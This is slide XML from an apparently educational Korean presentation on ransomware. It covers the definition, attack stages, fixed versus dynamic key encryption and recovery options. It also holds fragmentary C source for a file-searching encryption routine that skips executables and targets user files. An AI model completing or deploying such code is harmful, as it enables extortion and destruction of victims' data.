                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230" y="118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="235" y="118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238" y="118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243" y="118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249" y="116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254" y="111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260" y="104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="266" y="96"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="270" y="85"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274" y="73"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277" y="60"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="280" y="47"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="281" y="49"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="285" y="57"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="291" y="67"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="298" y="79"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="306" y="91"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="314" y="102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="322" y="109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329" y="111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="334" y="110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338" y="109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="344" y="108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="350" y="105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="357" y="102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="363" y="97"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370" y="93"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="375" y="87"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370" y="121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="363" y="162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="355" y="202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="349" y="238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="349" y="252"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="353" y="264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="362" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="372" y="278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="381" y="277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="389" y="273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="398" y="267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="407" y="259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415" y="249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421" y="239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428" y="227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="434" y="217"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="433" y="192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425" y="206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="417" y="219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410" y="231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="403" y="241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396" y="250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390" y="257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="385" y="262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379" y="264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="367" y="261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="364" y="248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="364" y="233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="366" y="216"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="372" y="176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379" y="134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="385" y="94"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390" y="55"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="383" y="63"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="377" y="70"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370" y="75"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="364" y="81"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="357" y="86"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="351" y="89"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="347" y="93"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="341" y="94"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333" y="93"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325" y="87"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="315" y="78"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="307" y="65"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="298" y="50"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="291" y="34"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="283" y="18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4" y="18"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="269" y="36"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="266" y="53"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260" y="70"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254" y="83"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="247" y="95"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241" y="102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232" y="105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227" y="105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221" y="104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215" y="102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208" y="98"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201" y="94"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="193" y="89"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185" y="83"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176" y="78"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183" y="96"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189" y="115"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196" y="133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202" y="151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208" y="171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215" y="191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222" y="209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229" y="229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234" y="245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236" y="260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234" y="272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226" y="278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="219" y="277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209" y="271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198" y="261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186" y="248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173" y="232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158" y="214"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="141" y="195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125" y="177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124" y="179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128" y="194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131" y="214"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131" y="230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125" y="238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117" y="238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108" y="238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98" y="238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86" y="235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73" y="234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60" y="231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43" y="227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27" y="224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33" y="232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39" y="241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46" y="252"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51" y="262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56" y="272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61" y="283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64" y="294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65" y="305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64" y="312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60" y="318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53" y="323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43" y="328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33" y="330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22" y="333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10" y="335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24" y="351"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53" y="366"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81" y="382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110" y="398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137" y="413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159" y="426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173" y="437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="178" y="444"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177" y="455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173" y="469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167" y="485"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163" y="498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="178" y="494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196" y="487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215" y="480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="235" y="472"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="253" y="464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="269" y="457"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="283" y="452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="292" y="450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300" y="452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="307" y="460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="312" y="470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="314" y="483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="326" y="602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="350" y="601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="341" y="473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342" y="461"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="347" y="453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352" y="447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="360" y="445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="368" y="446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="385" y="449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="404" y="452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="427" y="455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="450" y="460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="470" y="464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="486" y="467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="495" y="468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="489" y="455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="481" y="441"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="473" y="427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="470" y="415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="475" y="406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="487" y="392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="508" y="374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="532" y="353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560" y="331"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="587" y="309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613" y="287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="636" y="268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85781" y="3536210"/>
            <a:ext cx="22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Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Contents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Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              <a:cs typeface="Verdana" panose="020B060403050404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7170056" y="2574125"/>
            <a:ext cx="0" cy="158337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26830" y="2656169"/>
            <a:ext cx="1960793" cy="430887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01 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="22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랜섬웨어란</a:t>
            </a:r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13760" y="3175425"/>
            <a:ext cx="2653290" cy="430887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02 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="22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랜섬웨어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프로그램</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="22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562BA-F834-4A24-A463-2890AD59DEFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7713760" y="3686497"/>
            <a:ext cx="2653290" cy="430887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="262626"/>
          </a:solidFill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03 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="22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랜섬웨어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해결방안</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="22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02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1FF8B-59BD-4EEF-9F7B-D346032309AC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1457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0584" y="3167390"/>
            <a:ext cx="567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(Ransomware)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39554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해결방안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E51B7-04E1-44A2-BFEE-0F97BE4EBA75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4094921" y="1070090"/>
            <a:ext cx="45057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단방향 알고리즘일 때 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2300" dirty="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2300" dirty="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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF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-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복구 불가능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98836-6770-45FC-B90B-D70A9073593E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4094921" y="2415186"/>
            <a:ext cx="67983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양방향 알고리즘일 때 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2300" dirty="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2300" dirty="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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2300" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF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1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2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내부에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2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키값이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내장되어 있는 경우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 -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복구 가능성 높음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2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2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내부에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="20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키값이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내장되어 있지 않은 경우</a:t>
            </a:r>
            <a:endParaRPr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  -</a:t>
            </a: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복구하려면 돈을 지불해야함</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42388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7182" y="3044279"/>
            <a:ext cx="2837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  <a:ea typeface="배달의민족 한나" panose="02020603020101020101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>Thank</a:t>
            </a:r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  <a:ea typeface="배달의민족 한나" panose="02020603020101020101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="44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  <a:ea typeface="배달의민족 한나" panose="02020603020101020101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>you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Bradley Hand ITC" panose="03070402050302030203" pitchFamily="66" charset="0"/>
              <a:ea typeface="배달의민족 한나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8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013" y="3281420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(Ransomware)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란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0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6524" y="546411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01 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="32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랜섬웨어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(Ransomware)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란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75652" y="2036557"/>
            <a:ext cx="8083826" cy="278488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●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몸값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’(Ransom)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소프트웨어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’(Software)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합성어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●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시스템을 잠그거나 데이터를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암호화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 사용할 수 없도록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만든 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인질로 금전을 요구하는 악성 프로그램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●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핵심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암호화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복호화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1FF8B-59BD-4EEF-9F7B-D346032309AC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 원리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45D746CA-FB90-4447-89D7-2CA1435738B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3954780" y="1028700"/>
            <a:ext cx="162000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감염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3552D107-7D3F-450A-BE65-387C9B650977}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5241036" y="1028700"/>
            <a:ext cx="162000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파일검색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AA3D74E-EB61-456F-B324-1904E09B0F6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6527292" y="1028700"/>
            <a:ext cx="162000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암호화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9E57B456-ABB2-4342-B792-A6D4482454CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7813548" y="1028700"/>
            <a:ext cx="162000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파일이동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DA731B08-FFAC-452B-8048-180630D73F34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9099804" y="1028700"/>
            <a:ext cx="162000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메시지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D233EE20-3634-4714-A3D7-E2B8EE6FCDCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10386060" y="1028700"/>
            <a:ext cx="1620000" cy="7086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협상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A8ABA-13A9-4115-AC52-E1ABC69FA980}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4108174" y="2707932"/>
            <a:ext cx="502156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FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>고정키 암호화</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2500" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>암호화된 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>키값이</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 고정되어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DD268-FF3D-469A-BC81-2DE716BD2D75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4108174" y="4144993"/>
            <a:ext cx="502156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solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>다이나믹키</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 암호화</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2500" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>암호화된 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>키값이</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 랜덤이다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0585" y="2521059"/>
            <a:ext cx="56108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8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(Ransomware)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프로그램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#1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암호화 프로그램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#2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복호화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4066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-#1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암호화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파일 찾기 </a:t>
            </a:r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파일 암호화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3C66-495C-4BFB-BA61-9DAB1758A39D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4108174" y="778561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stdio.h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stdlib.h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Windows.h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#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>io.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="15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#pragma warning (disable :4996)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typedef struct _</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>finddata_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> FILE_SEARCH;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void </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>findfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(char* path);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int encrypt(char *filename, char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>filepath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int main(void) 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char path[1000] = "C:/Users/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>박창준</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/Desktop/test";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findfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(path);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return 0;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}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int encrypt(char *filename, char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>filepath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)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ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>암호화 함수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".exe") != 0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dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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".a")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dat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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ocx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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".mp3") || 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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hwp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"))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findfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(filename);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return -1;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6680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-#1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암호화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파일 찾기 </a:t>
            </a:r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파일 암호화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3C66-495C-4BFB-BA61-9DAB1758A39D}"/>
